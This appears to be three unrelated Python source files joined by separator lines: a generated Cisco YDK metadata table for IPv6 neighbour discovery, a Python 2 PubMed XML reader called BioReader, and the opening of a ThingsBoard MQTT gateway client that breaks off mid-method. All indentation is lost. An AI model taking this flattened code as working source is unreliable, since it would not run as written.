_MetaInfoClassMember('nd-virtual-router', REFERENCE_LIST, 'NdVirtualRouter' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NodeDiscovery.Nodes.Node.NdVirtualRouters.NdVirtualRouter',
[], [],
''' IPv6 ND virtual router operational data for
a specific interface
''',
'nd_virtual_router',
'Cisco-IOS-XR-ipv6-nd-oper', False),
],
'Cisco-IOS-XR-ipv6-nd-oper',
'nd-virtual-routers',
_yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper'
),
},
'Ipv6NodeDiscovery.Nodes.Node' : {
'meta_info' : _MetaInfoClass('Ipv6NodeDiscovery.Nodes.Node',
False,
[
_MetaInfoClassMember('node-name', ATTRIBUTE, 'str' , None, None,
[], ['([a-zA-Z0-9_]*\\d+/){1,2}([a-zA-Z0-9_]*\\d+)'],
''' The node name
''',
'node_name',
'Cisco-IOS-XR-ipv6-nd-oper', True),
_MetaInfoClassMember('bundle-interfaces', REFERENCE_CLASS, 'BundleInterfaces' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NodeDiscovery.Nodes.Node.BundleInterfaces',
[], [],
''' IPv6 ND list of bundle interfaces for a
specific node
''',
'bundle_interfaces',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('bundle-nodes', REFERENCE_CLASS, 'BundleNodes' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NodeDiscovery.Nodes.Node.BundleNodes',
[], [],
''' IPv6 ND list of bundle nodes for a specific
node
''',
'bundle_nodes',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('interfaces', REFERENCE_CLASS, 'Interfaces' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NodeDiscovery.Nodes.Node.Interfaces',
[], [],
''' IPv6 node discovery list of interfaces for a
specific node
''',
'interfaces',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('nd-virtual-routers', REFERENCE_CLASS, 'NdVirtualRouters' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NodeDiscovery.Nodes.Node.NdVirtualRouters',
[], [],
''' IPv6 ND virtual router information for a
specific interface
''',
'nd_virtual_routers',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('neighbor-interfaces', REFERENCE_CLASS, 'NeighborInterfaces' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NodeDiscovery.Nodes.Node.NeighborInterfaces',
[], [],
''' IPv6 node discovery list of neighbor
interfaces
''',
'neighbor_interfaces',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('neighbor-summary', REFERENCE_CLASS, 'NeighborSummary' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NodeDiscovery.Nodes.Node.NeighborSummary',
[], [],
''' IPv6 Neighbor summary
''',
'neighbor_summary',
'Cisco-IOS-XR-ipv6-nd-oper', False),
],
'Cisco-IOS-XR-ipv6-nd-oper',
'node',
_yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper'
),
},
'Ipv6NodeDiscovery.Nodes' : {
'meta_info' : _MetaInfoClass('Ipv6NodeDiscovery.Nodes',
False,
[
_MetaInfoClassMember('node', REFERENCE_LIST, 'Node' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NodeDiscovery.Nodes.Node',
[], [],
''' IPv6 node discovery operational data for a
particular node
''',
'node',
'Cisco-IOS-XR-ipv6-nd-oper', False),
],
'Cisco-IOS-XR-ipv6-nd-oper',
'nodes',
_yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper'
),
},
'Ipv6NodeDiscovery' : {
'meta_info' : _MetaInfoClass('Ipv6NodeDiscovery',
False,
[
_MetaInfoClassMember('nodes', REFERENCE_CLASS, 'Nodes' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NodeDiscovery.Nodes',
[], [],
''' IPv6 node discovery list of nodes
''',
'nodes',
'Cisco-IOS-XR-ipv6-nd-oper', False),
],
'Cisco-IOS-XR-ipv6-nd-oper',
'ipv6-node-discovery',
_yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper'
),
},
}
_meta_table['Ipv6NodeDiscovery.Nodes.Node.NeighborInterfaces.NeighborInterface.HostAddresses.HostAddress.LastReachedTime']['meta_info'].parent =_meta_table['Ipv6NodeDiscovery.Nodes.Node.NeighborInterfaces.NeighborInterface.HostAddresses.HostAddress']['meta_info']
_meta_table['Ipv6NodeDiscovery.Nodes.Node.NeighborInterfaces.NeighborInterface.HostAddresses.HostAddress']['meta_info'].parent =_meta_table['Ipv6NodeDiscovery.Nodes.Node.NeighborInterfaces.NeighborInterface.HostAddresses']['meta_info']
_meta_table['Ipv6NodeDiscovery.Nodes.Node.NeighborInterfaces.NeighborInterface.HostAddresses']['meta_info'].parent =_meta_table['Ipv6NodeDiscovery.Nodes.Node.NeighborInterfaces.NeighborInterface']['meta_info']
_meta_table['Ipv6NodeDiscovery.Nodes.Node.NeighborInterfaces.NeighborInterface']['meta_info'].parent =_meta_table['Ipv6NodeDiscovery.Nodes.Node.NeighborInterfaces']['meta_info']
_meta_table['Ipv6NodeDiscovery.Nodes.Node.NeighborSummary.Multicast']['meta_info'].parent =_meta_table['Ipv6NodeDiscovery.Nodes.Node.NeighborSummary']['meta_info']
_meta_table['Ipv6NodeDiscovery.Nodes.Node.NeighborSummary.Static']['meta_info'].parent =_meta_table['Ipv6NodeDiscovery.Nodes.Node.NeighborSummary']['meta_info']
_meta_table['Ipv6NodeDiscovery.Nodes.Node.NeighborSummary.Dynamic']['meta_info'].parent =_meta_table['Ipv6NodeDiscovery.Nodes.Node.NeighborSummary']['meta_info']
_meta_table['Ipv6NodeDiscovery.Nodes.Node.BundleNodes.BundleNode.Age']['meta_info'].parent =_meta_table['Ipv6NodeDiscovery.Nodes.Node.BundleNodes.BundleNode']['meta_info']
_meta_table['Ipv6NodeDiscovery.Nodes.Node.BundleNodes.BundleNode']['meta_info'].parent =_meta_table['Ipv6NodeDiscovery.Nodes.Node.BundleNodes']['meta_info']
_meta_table['Ipv6NodeDiscovery.Nodes.Node.BundleInterfaces.BundleInterface.NdParameters']['meta_info'].parent =_meta_table['Ipv6NodeDiscovery.Nodes.Node.BundleInterfaces.BundleInterface']['meta_info']
_meta_table['Ipv6NodeDiscovery.Nodes.Node.BundleInterfaces.BundleInterface.LocalAddress']['meta_info'].parent =_meta_table['Ipv6NodeDiscovery.Nodes.Node.BundleInterfaces.BundleInterface']['meta_info']
_meta_table['Ipv6NodeDiscovery.Nodes.Node.BundleInterfaces.BundleInterface.GlobalAddress']['meta_info'].parent =_meta_table['Ipv6NodeDiscovery.Nodes.Node.BundleInterfaces.BundleInterface']['meta_info']
_meta_table['Ipv6NodeDiscovery.Nodes.Node.BundleInterfaces.BundleInterface.MemberNode']['meta_info'].parent =_meta_table['Ipv6NodeDiscovery.Nodes.Node.BundleInterfaces.BundleInterface']['meta_info']
_meta_table['Ipv6NodeDiscovery.Nodes.Node.BundleInterfaces.BundleInterface']['meta_info'].parent =_meta_table['Ipv6NodeDiscovery.Nodes.Node.BundleInterfaces']['meta_info']
_meta_table['Ipv6NodeDiscovery.Nodes.Node.Interfaces.Interface']['meta_info'].parent =_meta_table['Ipv6NodeDiscovery.Nodes.Node.Interfaces']['meta_info']
_meta_table['Ipv6NodeDiscovery.Nodes.Node.NdVirtualRouters.NdVirtualRouter.LocalAddress']['meta_info'].parent =_meta_table['Ipv6NodeDiscovery.Nodes.Node.NdVirtualRouters.NdVirtualRouter']['meta_info']
_meta_table['Ipv6NodeDiscovery.Nodes.Node.NdVirtualRouters.NdVirtualRouter.VrGlobalAddress']['meta_info'].parent =_meta_table['Ipv6NodeDiscovery.Nodes.Node.NdVirtualRouters.NdVirtualRouter']['meta_info']
_meta_table['Ipv6NodeDiscovery.Nodes.Node.NdVirtualRouters.NdVirtualRouter']['meta_info'].parent =_meta_table['Ipv6NodeDiscovery.Nodes.Node.NdVirtualRouters']['meta_info']
_meta_table['Ipv6NodeDiscovery.Nodes.Node.NeighborInterfaces']['meta_info'].parent =_meta_table['Ipv6NodeDiscovery.Nodes.Node']['meta_info']
_meta_table['Ipv6NodeDiscovery.Nodes.Node.NeighborSummary']['meta_info'].parent =_meta_table['Ipv6NodeDiscovery.Nodes.Node']['meta_info']
_meta_table['Ipv6NodeDiscovery.Nodes.Node.BundleNodes']['meta_info'].parent =_meta_table['Ipv6NodeDiscovery.Nodes.Node']['meta_info']
_meta_table['Ipv6NodeDiscovery.Nodes.Node.BundleInterfaces']['meta_info'].parent =_meta_table['Ipv6NodeDiscovery.Nodes.Node']['meta_info']
_meta_table['Ipv6NodeDiscovery.Nodes.Node.Interfaces']['meta_info'].parent =_meta_table['Ipv6NodeDiscovery.Nodes.Node']['meta_info']
_meta_table['Ipv6NodeDiscovery.Nodes.Node.NdVirtualRouters']['meta_info'].parent =_meta_table['Ipv6NodeDiscovery.Nodes.Node']['meta_info']
_meta_table['Ipv6NodeDiscovery.Nodes.Node']['meta_info'].parent =_meta_table['Ipv6NodeDiscovery.Nodes']['meta_info']
_meta_table['Ipv6NodeDiscovery.Nodes']['meta_info'].parent =_meta_table['Ipv6NodeDiscovery']['meta_info']
|
|
#!/usr/bin/python
"""
Classes to read and process MedLine XML record files, for use in processing modules.
They handle the XML format used by the PubMed and MedLine services, for example as returned by the eutils online services:
>>> xml_records = urllib.urlopen('http://eutils.ncbi.nlm.nih.gov/entrez/eutils/efetch.fcgi?db=pubmed&id='+list_of_pmids+'&retmode=xml').read()
On use, an object is created as a global repository, from which records (also objects) can be queried and extracted. These record objects have properties such as title, authors, and abstract that return their string values.
The somewhat long loading times can be shortened on later runs by serializing the objects with the cPickle module (see the sketch after this docstring).
USAGE:
>>> from BioReader import *
>>> data = DataContainer('AllAbstracts.xml','pubmed')
>>> data.howmany # len(data.dictRecords.keys())
>>> data.keys # data.dictRecords.keys()
>>> record = data.Read('7024555')
>>> record.title
u'The birA gene of Escherichia coli encodes a biotin holoenzyme synthetase.'
record +
- B{.title}
- B{.pmid}
- B{.Abs} I{(abstracts)}
- B{.year}
- B{.journal}
- B{.auth} I{(list of authors)}
- B{.m} I{(list of MeSH keywords, descriptors and qualifiers)}
- B{.MD} I{(MeSH Descriptors)}
- B{.MQ} I{(MeSH Qualifiers, if any)}
- B{.MDMay} I{(list of Major MeSH Descriptors, if any)}
- B{.MQMay} I{(list of Major MeSH Qualifiers, if any)}
- B{.paper} I{(full text flat file, if it exists in a user-defined repository)}
The Search method inside the DataContainer class is not working well and should be rewritten using better XML techniques and methods.
A class (CreateXML) has been added recently to create the PubMed XML file from a list of PubMed ids. It has not been fully integrated with the DataContainer class.
Another class should be able to query keywords directly against PubMed, to get either the PubMed ids or the XML directly, using either BioPython's PubMed modules or Eutils' facilities directly.
"""
#__docformat__ = 'epytext en'
# General info
__version__ = '5.0'
__author__ = 'Carlos Rodriguez'
__url__ = 'http://www.cnio.es'
__license__ = 'GNU'
from xml.dom.minidom import parseString
import string
import re
import os
import time  # needed at module level by DataContainer.Search; __init__ also imports it locally
class BioReader:
"""
Class BioReader for BioMedical files
"""
def __init__(self, string, path=None):
"""
Initialize class with XML string and returns record data and body of text objects.
>>> single_record = BioReader(record)
>>> single_record.title
u'The birA gene of Escherichia coli encodes a biotin holoenzyme synthetase.'
>>> single_record.pmid
u'7024555'
single_record +
- B{.title}
- B{.pmid}
- B{.Abs} I{(abstracts)}
- B{.year}
- B{.journal}
- B{.auth} I{(list of authors)}
- B{.m} I{(list of MeSH keywords, descriptors and qualifiers)}
- B{.MD} I{(MeSH Descriptors)}
- B{.MQ} I{(MeSH Qualifiers, if any)}
- B{.MDMay} I{(list of Major MeSH Descriptors, if any)}
- B{.MQMay} I{(list of Major MeSH Qualifiers, if any)}
- B{.paper} I{(full text flat file if it exists in a user-defined repository [see notes below])}
If we use a repository with full text papers (named in the pmid<pmidnumber>.txt format),
we can use the following, after specifying it in the DataContainer we instantiated:
>>> data.Repository("/repositorio/Regulontxt/")
>>> record = data.dictRecords['9209026']
>>> single_record = BioReader(record, data.repository)
Or, if the path was not set through the DataContainer class, pass it directly:
>>> single_record = BioReader(record, '/path/to/repository/')
>>> single_record.paper
'Aerobic Regulation of the sucABCD Genes of Escherichia coli,Which Encode \xef\xbf\xbd-Ketoglutarate Dehydrogenase andSuccinyl Coenzyme A Synthetase: Roles of ArcA,Fnr, and the Upstream sdhCDAB Promoter\n.....'
"""
self.tags = re.compile("<.*?>")
self.parsed = parseString(string)
self.document = self.parsed.documentElement
self.pmid = self.document.getElementsByTagName("PMID")[0].firstChild.data
self.year = self.document.getElementsByTagName("DateCreated")[0].getElementsByTagName("Year")[0].firstChild.data
self.journal = self.document.getElementsByTagName("MedlineJournalInfo")[0].getElementsByTagName("MedlineTA")[0].firstChild.data
self.testAbs = self.document.getElementsByTagName("Abstract")
if path is not None:
self.path = path
self.paper = self.GetFullPaper()
else:
self.path = None
self.paper = None
try:
self.year = self.document.getElementsByTagName("PubDate")[0].getElementsByTagName("Year")[0].firstChild.data
except IndexError:
self.year = self.document.getElementsByTagName("DateCreated")[0].getElementsByTagName("Year")[0].firstChild.data
try:
self.Abs = self.document.getElementsByTagName("Abstract")[0].getElementsByTagName("AbstractText")[0].firstChild.data
except IndexError:
self.Abs = "n/a"
self.title = self.document.getElementsByTagName("ArticleTitle")[0].firstChild.data
try:
self.authorsList = self.document.getElementsByTagName("AuthorList")[0].getElementsByTagName("Author")
self.Lista = [self.authorize(y.childNodes) for y in self.authorsList]
s = ""
for x in self.Lista:
s = s + x + "\n"
self.auth = s
except AttributeError:
self.auth = " "
except IndexError:
self.auth = " "
try:
self.meshes = self.document.getElementsByTagName("MeshHeadingList")[0].getElementsByTagName("MeshHeading")
self.ListaMs = [self.Meshes(z.childNodes) for z in self.meshes]
self.MD = []
self.MQ = []
self.MDMay = []
self.MQMay = []
for z in self.meshes:
MD,MQ,MDMay,MQMay = self.MeshKeys(z)
self.MD = MD + self.MD
self.MQ = MQ + self.MQ
self.MDMay = MDMay + self.MDMay
self.MQMay = MQMay + self.MQMay
self.m = ""
for x in self.ListaMs:
self.m = x+" \n "+self.m
#self.p = None
except IndexError:
self.m = "n/a"
self.meshes = "n/a"
self.MQ = None
self.MD = None
self.MDMay = None
self.MQMay = None
#self.p = None
#from DataContainer import repository
#self.authors = string.join( self.Lista )#[self.authorize(x)+"\n" for x in self.Lista]
def __repr__(self):
return "<BioReader record instance: pmid: "+self.pmid+" title: "+self.title+" abstract: "+self.Abs+">"
def authorize(self, node):
s = ""
for z in node:
f = z.toxml()
f = re.sub(self.tags,"",f)
f = re.sub("\n","",f)
f = re.sub("\t"," ",f)
f = re.sub(" ","",f)
s = s + f+" "
return s
def Meshes(self, node):
s = ""
for z in node:
f = z.toxml()
f = re.sub(self.tags,"",f)
f = re.sub("\n","",f)
f = re.sub("\t"," ",f)
f = re.sub(" ","",f)
s = s + f+" "
return s
def MeshKeys(self,node):
"""
Create sets of MesH Keywords, separating qualifiers and descriptors, as well as //
MajorTopics for each one. returns Lists.
"""
listDescriptors = node.getElementsByTagName("DescriptorName")
listQualifiers = node.getElementsByTagName("QualifierName")
MD = [x.firstChild.data for x in listDescriptors]
MQ = [x.firstChild.data for x in listQualifiers]
MQMay = [q.firstChild.data for q in listQualifiers if (q.getAttribute("MajorTopicYN") == "Y")]
MDMay = [q.firstChild.data for q in listDescriptors if (q.getAttribute("MajorTopicYN") == "Y")]
return MD,MQ,MDMay,MQMay
def GetFullPaper(self):
"""
Gets the full paper from the path of an (optional) repository.
The full papers must have the following format:
pmid+<pmidnumber>+.txt (last extension optional)
"""
pmidList = os.listdir(self.path)
if pmidList[0][-4:] == '.txt':
pmidList = [x[4:-4] for x in pmidList]
formato = 1
else:
pmidList = [x[4:] for x in pmidList]
formato = None
if self.pmid in pmidList:
if formato:
self.paper = open(self.path+"pmid"+self.pmid+".txt").read()
return self.paper
else:
self.paper = open(self.path+"pmid"+self.pmid).read()
return self.paper
else:
self.paper = None
class DataContainer:
"""
Data container for Pubmed and Medline XML files.
The instance creates a dictionary object (dictRecords) of PMIDs,
referenced to string of record, which BioReader class can parse.
The method C{Read} creates a queryable object for each record associated with a PMID:
>>> from BioReader import *
>>> data = DataContainer('AllAbs.xml','pubmed')
>>> data.dictRecords.keys()[23]
>>> u'7024555'
>>> data.howmany
>>> 14350
1) Method One
>>> record = data.Read('7024555')
>>> record.title
u'The birA gene of Escherichia coli encodes a biotin holoenzyme synthetase.'
record +
- B{.title}
- B{.pmid}
- B{.Abs} I{(abstracts)}
- B{.year}
- B{.journal}
- B{.auth} I{(list of authors)}
- B{.m} I{(list of MeSH keywords, descriptors and qualifiers)}
- B{.MD} I{(MeSH Descriptors)}
- B{.MQ} I{(MeSH Qualifiers, if any)}
- B{.MDMay} I{(list of Major MeSH Descriptors, if any)}
- B{.MQMay} I{(list of Major MeSH Qualifiers, if any)}
- B{.paper} I{(full text flat file if it exists in a user-defined repository [see notes below])}
If we use a repository with full text papers
(named in the pmid<pmidnumber>.txt format, extension optional),
we can use the following, after specifying it in the DataContainer we instantiated:
>>> data.Repository("/repositorio/Regulontxt/")
>>> record.paper
'Aerobic Regulation of the sucABCD Genes of Escherichia coli, Which Encode \xef\xbf\xbd-Ketoglutarate Dehydrogenase andSuccinyl Coenzyme A Synthetase: Roles of ArcA,Fnr, and the Upstream sdhCDAB Promoter\n.....
2) Method two
>>> record = data.dictRecords['7024555']
>>> single_record = BioReader(record)
>>> single_record.title
>>> u'The birA gene of Escherichia coli encodes a biotin holoenzyme synthetase.' etc ...
(See L{BioReader})
"""
def __init__(self,file,format="medline"):
"""
Initializes class and returns record data and body of text objects
"""
import time
tinicial = time.time()
self.file = file
whole = open(self.file).read()
if format.lower() == "medline":
self.rerecord = re.compile(r'\<MedlineCitation Owner="NLM" Status="MEDLINE"\>'r'(?P<record>.+?)'r'\</MedlineCitation\>',re.DOTALL)
elif format.lower() == "pubmed":
self.rerecord = re.compile(r'\<PubmedArticle\>'r'(?P<record>.+?)'r'\</PubmedArticle\>',re.DOTALL)
else:
print "Unrecognized format"
self.RecordsList = re.findall(self.rerecord,whole)
whole = ""
self.RecordsList = ["<PubmedArticle>"+x.rstrip()+"</PubmedArticle>" for x in self.RecordsList]
self.dictRecords = self.Createdict()
self.RecordsList = []
self.howmany = len(self.dictRecords.keys())
self.keys = self.dictRecords.keys()
tfinal = time.time()
self.repository = None
print "finished loading at ",time.ctime(tfinal)
print "loaded in", tfinal-tinicial," seconds, or",((tfinal-tinicial)/60)," minutes"
def __repr__(self):
return "<BioReader Data Container Instance: source filename: "+self.file+" \nnumber of files: "+str(self.howmany)+">"
def Repository(self,repository):
"""
Establish path to a full text repository, in case you want to use that variable in the BioReader
"""
self.repository = repository
return self.repository
def Createdict(self):
"""
Creates a dictionary with pmid number indexing record xml string
"""
i = 0
dictRecords = {}
for p in self.RecordsList:
r = BioReader(p)
dictRecords[r.pmid] = self.RecordsList[i]
i += 1
return dictRecords
def Read(self,pmid):
if self.repository:
self.record = BioReader(self.dictRecords[pmid],self.repository)
else:
self.record = BioReader(self.dictRecords[pmid])
return self.record
def Search(self,cadena,where=None):
"""
This method is not working. Needs to be redone to comply with more up-to-date XML search methods
Searches for "cadena" string inside the selected field, and returns a list of pmid where it was found.
If not "where" field is provided, will search in all of the record.
You can search in the following fields:
- title
- year
- journal
- auth or authors
- 'abs' or 'Abs' or 'abstract'
- paper or "full" (if full-text repository has been defined)
- pmid
With defined field search is very slow but much more accurate. See for comparison:
>>> buscados = data.Search("Richard")
Searched in 0.110424995422 seconds, or 0.00184041659037 minutes
Found a total of 75 hits for your query, in all fields
>>> buscados = data.Search("Richard","auth")
Searched in 66.342936039 seconds, or 1.10571560065 minutes
Found a total of 75 hits for your query, in the auth field
"""
tinicial = time.time()
resultlist = []
if where:
for cadapmid in self.dictRecords.keys():
d = self.Read(cadapmid)
if where == 'title':
tosearch = d.title
elif where == 'year':
tosearch = d.year
elif where == 'journal':
tosearch = d.journal
elif where in ('auth', 'authors'):
    tosearch = d.auth
elif where in ('m', 'mesh'):
    tosearch = d.m
elif where in ('abs', 'Abs', 'abstract'):
    tosearch = d.Abs
elif where in ('paper', 'full'):
tosearch = d.paper
if self.repository:
pass
else:
print "No full text repository has been defined...."
return None
elif where == 'pmid':
tosearch = d.pmid
hit = re.search(cadena,tosearch)
if hit:
resultlist.append(d.pmid)
else:
pass
if len(resultlist)!= 0:
tfinal = time.time()
print "Searched in", tfinal-tinicial," seconds, or",((tfinal-tinicial)/60)," minutes"
print "Found a total of ",str(len(resultlist))," hits for your query, in the ",where," field"
return resultlist
else:
    tfinal = time.time()
    print "Searched in", tfinal-tinicial," seconds, or",((tfinal-tinicial)/60)," minutes"
    print "Query not found"
    return None
else:
tosearch = ''
for cadapmid in self.dictRecords.keys():
tosearch = self.dictRecords[cadapmid]
hit = re.search(cadena,tosearch)
if hit:
resultlist.append(cadapmid)
else:
pass
if len(resultlist)!= 0:
tfinal = time.time()
print "Searched in", tfinal-tinicial," seconds, or",((tfinal-tinicial)/60)," minutes"
print "Found a total of ",str(len(resultlist))," hits for your query, in all fields"
return resultlist
else:
tfinal = time.time()
print "Searched in", tfinal-tinicial," seconds, or",((tfinal-tinicial)/60)," minutes"
print "Query not found"
return None
class CreateXML:
"""
Class to generate PubMed XMLs from a list of ids (one per line), to use with BioRea.
downloads in 100 batch.
Usage:
outputfile = "NuevosPDFRegulon.xml"
inputfile = "/home/crodrigp/listaNuevos.txt"
>>> XMLCreator = CreateXML()
>>> XMLCreator.GenerateFile(inputfile,outputfile)
>>> parseableString = XMLCreator.Generate2String(inputfile)
or
>>> XMLString = XMLCreator.Generate2String(inputfile)
"""
def __init__(self):
    # Bind these modules at global scope so the other methods can see them;
    # a plain import inside __init__ would make them locals of __init__ only.
    global urllib, time, string, random
    import urllib, time, string, random
def getXml(self,s):
pedir = urllib.urlopen("http://eutils.ncbi.nlm.nih.gov/entrez/eutils/efetch.fcgi?db=pubmed&id="+s+"&retmode=xml")
stringxml = pedir.read()
self.salida.write(stringxml[:-20]+"\n")
def getXmlString(self,s):
pedir = urllib.urlopen("http://eutils.ncbi.nlm.nih.gov/entrez/eutils/efetch.fcgi?db=pubmed&id="+s+"&retmode=xml")
stringxml = pedir.read()
return stringxml[:-20]+"\n"
def listastring(self,list):
suso = string.join(list,",")
return suso
def GenerateFile(self,inputfile,outputfile):
self.outputfile = outputfile
self.inputfile = inputfile
self.salida = open(self.outputfile,"w")
self.listaR = open(self.inputfile).readlines()
self.listafin = [x.rstrip() for x in self.listaR]
self.listacorr = []
while self.listafin != []:
if len(self.listafin) < 100:
cientos = self.listafin[:]
#self.listafin = []
else:
cientos = self.listafin[:100]
print "new length self.listacorr", len(self.listafin)
if len(self.listafin) <= 0:
break
else:
#time.sleep(120)
nueva = self.listastring(cientos)
self.getXml(nueva)
for c in cientos:
print c
self.listafin.remove(c)
self.salida.close()
def Generate2String(self,inputfile):
self.inputfile = inputfile
self.listaR = open(self.inputfile).readlines()
self.AllXML = ''
self.listafin = [x.rstrip() for x in self.listaR]
self.listacorr = []
while self.listafin != []:
if len(self.listafin) < 100:
cientos = self.listafin[:]
#self.listafin = []
else:
cientos = self.listafin[:100]
print "new length self.listacorr", len(self.listafin)
if len(self.listafin) <= 0:
break
else:
time.sleep(120)
nueva = self.listastring(cientos)
newX = self.getXmlString(nueva)
self.AllXML = self.AllXML + newX
for c in cientos:
print c
self.listafin.remove(c)
return self.AllXML
|
|
# Copyright 2022. ThingsBoard
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import time
from simplejson import dumps
from thingsboard_gateway.tb_client.tb_device_mqtt import TBDeviceMqttClient
from thingsboard_gateway.tb_utility.tb_utility import TBUtility
GATEWAY_ATTRIBUTES_TOPIC = "v1/gateway/attributes"
GATEWAY_ATTRIBUTES_REQUEST_TOPIC = "v1/gateway/attributes/request"
GATEWAY_ATTRIBUTES_RESPONSE_TOPIC = "v1/gateway/attributes/response"
GATEWAY_MAIN_TOPIC = "v1/gateway/"
GATEWAY_RPC_TOPIC = "v1/gateway/rpc"
GATEWAY_RPC_RESPONSE_TOPIC = "v1/gateway/rpc/response"
GATEWAY_CLAIMING_TOPIC = "v1/gateway/claim"
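# Illustrative payload shapes for the gateway topics above, as assembled by the
# publishing methods further below (device name and values are made-up
# examples):
#   v1/gateway/connect    -> {"device": "Device A", "type": "default"}
#   v1/gateway/telemetry  -> {"Device A": [{"ts": 1483228800000, "values": {"temperature": 42}}]}
#   v1/gateway/attributes -> {"Device A": {"model": "R1"}}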
log = logging.getLogger("tb_connection")
class TBGatewayMqttClient(TBDeviceMqttClient):
def __init__(self, host, port, token=None, gateway=None, quality_of_service=1):
super().__init__(host, port, token, quality_of_service)
self.quality_of_service = quality_of_service
self.__max_sub_id = 0
self.__sub_dict = {}
self.__connected_devices = {"*"}
self.devices_server_side_rpc_request_handler = None
self._client.on_connect = self._on_connect
self._client.on_message = self._on_message
self._client.on_subscribe = self._on_subscribe
self._client._on_unsubscribe = self._on_unsubscribe
self._gw_subscriptions = {}
self.gateway = gateway
def _on_connect(self, client, userdata, flags, result_code, *extra_params):
super()._on_connect(client, userdata, flags, result_code, *extra_params)
if result_code == 0:
self._gw_subscriptions[int(self._client.subscribe(GATEWAY_ATTRIBUTES_TOPIC, qos=1)[1])] = GATEWAY_ATTRIBUTES_TOPIC
self._gw_subscriptions[int(self._client.subscribe(GATEWAY_ATTRIBUTES_RESPONSE_TOPIC, qos=1)[1])] = GATEWAY_ATTRIBUTES_RESPONSE_TOPIC
self._gw_subscriptions[int(self._client.subscribe(GATEWAY_RPC_TOPIC, qos=1)[1])] = GATEWAY_RPC_TOPIC
# self._gw_subscriptions[int(self._client.subscribe(GATEWAY_RPC_RESPONSE_TOPIC)[1])] = GATEWAY_RPC_RESPONSE_TOPIC
def _on_subscribe(self, client, userdata, mid, reasoncodes, properties=None):
subscription = self._gw_subscriptions.get(mid)
if subscription is not None:
if mid == 128:
log.error("Service subscription to topic %s - failed.", subscription)
del self._gw_subscriptions[mid]
else:
log.debug("Service subscription to topic %s - successfully completed.", subscription)
del self._gw_subscriptions[mid]
def _on_unsubscribe(self, *args):
log.debug(args)
def get_subscriptions_in_progress(self):
return bool(self._gw_subscriptions)
def _on_message(self, client, userdata, message):
content = TBUtility.decode(message)
super()._on_decoded_message(content, message)
self._on_decoded_message(content, message)
def _on_decoded_message(self, content, message):
if message.topic.startswith(GATEWAY_ATTRIBUTES_RESPONSE_TOPIC):
with self._lock:
req_id = content["id"]
# pop callback and use it
if self._attr_request_dict[req_id]:
self._attr_request_dict.pop(req_id)(content, None)
else:
log.error("Unable to find callback to process attributes response from TB")
elif message.topic == GATEWAY_ATTRIBUTES_TOPIC:
with self._lock:
# callbacks for everything
if self.__sub_dict.get("*|*"):
for device in self.__sub_dict["*|*"]:
self.__sub_dict["*|*"][device](content)
# callbacks for device. in this case callback executes for all attributes in message
if content.get("device") is None:
return
target = content["device"] + "|*"
if self.__sub_dict.get(target):
for device in self.__sub_dict[target]:
self.__sub_dict[target][device](content)
# callbacks per attribute; here the callback executes once for each matching attribute in the message
targets = [content["device"] + "|" + attribute for attribute in content["data"]]
for target in targets:
if self.__sub_dict.get(target):
for device in self.__sub_dict[target]:
self.__sub_dict[target][device](content)
elif message.topic == GATEWAY_RPC_TOPIC:
if self.devices_server_side_rpc_request_handler:
self.devices_server_side_rpc_request_handler(self, content)
def __request_attributes(self, device, keys, callback, type_is_client=False):
if not keys:
log.error("There are no keys to request")
return False
keys_str = ""
for key in keys:
keys_str += key + ","
keys_str = keys_str[:len(keys_str) - 1]
ts_in_millis = int(round(time.time() * 1000))
attr_request_number = self._add_attr_request_callback(callback)
msg = {"key": keys_str,
"device": device,
"client": type_is_client,
"id": attr_request_number}
info = self._client.publish(GATEWAY_ATTRIBUTES_REQUEST_TOPIC, dumps(msg), 1)
self._add_timeout(attr_request_number, ts_in_millis + 30000)
return info
def gw_request_shared_attributes(self, device_name, keys, callback):
return self.__request_attributes(device_name, keys, callback, False)
def gw_request_client_attributes(self, device_name, keys, callback):
return self.__request_attributes(device_name, keys, callback, True)
def gw_send_attributes(self, device, attributes, quality_of_service=1):
return self.publish_data({device: attributes}, GATEWAY_MAIN_TOPIC + "attributes", quality_of_service)
def gw_send_telemetry(self, device, telemetry, quality_of_service=1):
if not isinstance(telemetry, list) and not (isinstance(telemetry, dict) and telemetry.get("ts") is not None):
telemetry = [telemetry]
return self.publish_data({device: telemetry}, GATEWAY_MAIN_TOPIC + "telemetry", quality_of_service, )
def gw_connect_device(self, device_name, device_type):
